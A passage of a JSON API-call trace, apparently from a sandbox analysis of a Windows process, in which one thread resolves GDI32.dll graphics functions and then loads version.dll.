"Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77066ca0" } ], "repeated": 0, "id": 271 }, { "timestamp": "2025-03-02 21:32:32,279", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SelectClipRgn" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77065f10" } ], "repeated": 0, "id": 272 }, { "timestamp": "2025-03-02 21:32:32,279", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SaveDC" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067040" } ], "repeated": 0, "id": 273 }, { "timestamp": "2025-03-02 21:32:32,279", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "RestoreDC" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067000" } ], "repeated": 0, "id": 274 }, { "timestamp": "2025-03-02 21:32:32,279", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "Rectangle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77064730" } ], "repeated": 0, "id": 275 }, { "timestamp": "2025-03-02 21:32:32,279", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "RectVisible" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063f90" } ], "repeated": 0, "id": 276 }, { "timestamp": "2025-03-02 21:32:32,279", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "RealizePalette" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770647d0" } ], "repeated": 0, "id": 277 }, { "timestamp": "2025-03-02 21:32:32,295", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "Polyline" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77064da0" } ], "repeated": 0, "id": 278 }, { "timestamp": "2025-03-02 21:32:32,295", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "Polygon" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770646d0" } ], "repeated": 0, "id": 279 }, { "timestamp": "2025-03-02 21:32:32,310", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "PlayEnhMetaFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7706d860" } ], "repeated": 0, "id": 280 }, { "timestamp": "2025-03-02 21:32:32,310", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "PatBlt" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063dd0" } ], "repeated": 0, "id": 281 }, { "timestamp": "2025-03-02 21:32:32,326", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "MoveToEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063e60" } ], "repeated": 0, "id": 282 }, { "timestamp": "2025-03-02 21:32:32,342", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "MaskBlt" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7706b2f0" } ], "repeated": 0, "id": 283 }, { "timestamp": "2025-03-02 21:32:32,342", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "LineTo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77064330" } ], "repeated": 0, "id": 284 }, { "timestamp": "2025-03-02 21:32:32,357", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "IntersectClipRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77066ed0" } ], "repeated": 0, "id": 285 }, { "timestamp": "2025-03-02 21:32:32,357", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetWindowOrgEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77068300" } ], "repeated": 0, "id": 286 }, { "timestamp": "2025-03-02 21:32:32,373", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetWinMetaFileBits" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77068b60" } ], "repeated": 0, "id": 287 }, { "timestamp": "2025-03-02 21:32:32,373", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetTextMetricsA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063ca0" } ], "repeated": 0, "id": 288 }, { "timestamp": "2025-03-02 21:32:32,373", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetTextExtentPoint32A" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77065230" } ], "repeated": 0, "id": 289 }, { "timestamp": "2025-03-02 21:32:32,389", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetSystemPaletteEntries" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067670" } ], "repeated": 0, "id": 290 }, { "timestamp": "2025-03-02 21:32:32,389", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetStockObject" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77065f50" } ], "repeated": 0, "id": 291 }, { "timestamp": "2025-03-02 21:32:32,389", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetRgnBox" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063bc0" } ], "repeated": 0, "id": 292 }, { "timestamp": "2025-03-02 21:32:32,389", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetROP2" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770647a0" } ], "repeated": 0, "id": 293 }, { "timestamp": "2025-03-02 21:32:32,389", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetPolyFillMode" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7706b170" } ], "repeated": 0, "id": 294 }, { "timestamp": "2025-03-02 21:32:32,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetPixel" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77064cf0" } ], "repeated": 0, "id": 295 }, { "timestamp": "2025-03-02 21:32:32,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetPaletteEntries" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770675d0" } ], "repeated": 0, "id": 296 }, { "timestamp": "2025-03-02 21:32:32,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetObjectA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063ea0" } ], "repeated": 0, "id": 297 }, { "timestamp": "2025-03-02 21:32:32,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetEnhMetaFilePaletteEntries" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77068b20" } ], "repeated": 0, "id": 298 }, { "timestamp": "2025-03-02 21:32:32,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetEnhMetaFileHeader" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77068af0" } ], "repeated": 0, "id": 299 }, { "timestamp": "2025-03-02 21:32:32,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetEnhMetaFileBits" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7706d5f0" } ], "repeated": 0, "id": 300 }, { "timestamp": "2025-03-02 21:32:32,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetDeviceCaps" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77065fc0" } ], "repeated": 0, "id": 301 }, { "timestamp": "2025-03-02 21:32:32,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetDIBits" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770670b0" } ], "repeated": 0, "id": 302 }, { "timestamp": "2025-03-02 21:32:32,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetDIBColorTable" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770682a0" } ], "repeated": 0, "id": 303 }, { "timestamp": "2025-03-02 21:32:32,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetDCOrgEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067fa0" } ], "repeated": 0, "id": 304 }, { "timestamp": "2025-03-02 21:32:32,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetDCBrushColor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067f80" } ], "repeated": 0, "id": 305 }, { "timestamp": "2025-03-02 21:32:32,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetCurrentPositionEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7706d580" } ], "repeated": 0, "id": 306 }, { "timestamp": "2025-03-02 21:32:32,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetClipBox" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770642f0" } ], "repeated": 0, "id": 307 }, { "timestamp": "2025-03-02 21:32:32,420", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetBrushOrgEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77068280" } ], "repeated": 0, "id": 308 }, { "timestamp": "2025-03-02 21:32:32,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GetBitmapBits" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77065400" } ], "repeated": 0, "id": 309 }, { "timestamp": "2025-03-02 21:32:32,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "GdiFlush" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770681f0" } ], "repeated": 0, "id": 310 }, { "timestamp": "2025-03-02 21:32:32,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "ExcludeClipRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77068f00" } ], "repeated": 0, "id": 311 }, { "timestamp": "2025-03-02 21:32:32,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "DeleteObject" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77065880" } ], "repeated": 0, "id": 312 }, { "timestamp": "2025-03-02 21:32:32,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "DeleteEnhMetaFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77064770" } ], "repeated": 0, "id": 313 }, { "timestamp": "2025-03-02 21:32:32,435", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "DeleteDC" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77066890" } ], "repeated": 0, "id": 314 }, { "timestamp": "2025-03-02 21:32:32,451", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateSolidBrush" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067440" } ], "repeated": 0, "id": 315 }, { "timestamp": "2025-03-02 21:32:32,451", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateRectRgn" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77066360" } ], "repeated": 0, "id": 316 }, { "timestamp": "2025-03-02 21:32:32,467", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreatePenIndirect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77065440" } ], "repeated": 0, "id": 317 }, { "timestamp": "2025-03-02 21:32:32,467", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreatePalette" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770676b0" } ], "repeated": 0, "id": 318 }, { "timestamp": "2025-03-02 21:32:32,467", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateHalftonePalette" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770676e0" } ], "repeated": 0, "id": 319 }, { "timestamp": "2025-03-02 21:32:32,467", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateFontIndirectA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77064cc0" } ], "repeated": 0, "id": 320 }, { "timestamp": "2025-03-02 21:32:32,482", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateDIBitmap" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067380" } ], "repeated": 0, "id": 321 }, { "timestamp": "2025-03-02 21:32:32,482", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateDIBSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77065e80" } ], "repeated": 0, "id": 322 }, { "timestamp": "2025-03-02 21:32:32,482", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateCompatibleDC" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77066d90" } ], "repeated": 0, "id": 323 }, { "timestamp": "2025-03-02 21:32:32,482", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateCompatibleBitmap" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067070" } ], "repeated": 0, "id": 324 }, { "timestamp": "2025-03-02 21:32:32,482", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateBrushIndirect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770643b0" } ], "repeated": 0, "id": 325 }, { "timestamp": "2025-03-02 21:32:32,482", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CreateBitmap" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067400" } ], "repeated": 0, "id": 326 }, { "timestamp": "2025-03-02 21:32:32,498", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CopyEnhMetaFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77069210" } ], "repeated": 0, "id": 327 }, { "timestamp": "2025-03-02 21:32:32,498", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "CombineRgn" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063370" } ], "repeated": 0, "id": 328 }, { "timestamp": "2025-03-02 21:32:32,514", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "BitBlt" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77066de0" } ], "repeated": 0, "id": 329 }, { "timestamp": "2025-03-02 21:32:32,514", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "version.dll" }, { "name": "ModuleHandle", "value": "0x004e72ee" } ], "repeated": 0, "id": 330 }, { "timestamp": "2025-03-02 21:32:32,529", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\version" }, { "name": "DllBase", "value": "0x74a30000" } ], "repeated": 0, "id": 331 }, { "timestamp": "2025-03-02 21:32:32,529", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "version.dll" }, { "name": "BaseAddress", "value": "0x74a30000" } ], "repeated": 0, "id": 332 }, { "timestamp": "2025-03-02 21:32:32,529", "thread_id": "7632", "caller": 